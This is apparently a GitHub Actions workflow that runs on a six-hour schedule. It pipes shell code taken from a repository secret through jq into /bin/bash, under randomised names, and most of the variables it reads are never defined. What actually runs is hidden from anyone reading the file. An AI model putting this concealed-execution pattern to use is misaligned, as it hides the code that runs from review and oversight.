name: dashengwanglei

on:
  workflow_dispatch:
  schedule:
    - cron: '54 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dashengwanglei
        env:
          m83698: ${{ secrets.m83698 }}
        run: |
          echo $m83698 | jq -r .s868 | /bin/bash
          echo $wb87 | jq -r .v1631 | /bin/bash
          echo $lk45 | jq -r .sbwv5 | /bin/bash
          echo $zkgpb19485 | jq -r .jz3439 | /bin/bash
          echo $ipwdr2140 | jq -r .mq703 | /bin/bash
          echo $jhqmb733 | jq -r .upqpi544 | /bin/bash
          echo $qtr08092 | jq -r .iq3 | /bin/bash
          echo $v59 | jq -r .z2399 | /bin/bash
          echo $ue5 | jq -r .ycsew7 | /bin/bash
          echo $fotk52 | jq -r .gcpep6 | /bin/bash
          echo $xy0 | jq -r .s4 | /bin/bash
          echo $o4440 | jq -r .yca47 | /bin/bash
          echo $v622 | jq -r .fsvli1934 | /bin/bash
          echo $fvfmu207 | jq -r .xhr59934 | /bin/bash
          echo $awwn918 | jq -r .snlk945 | /bin/bash

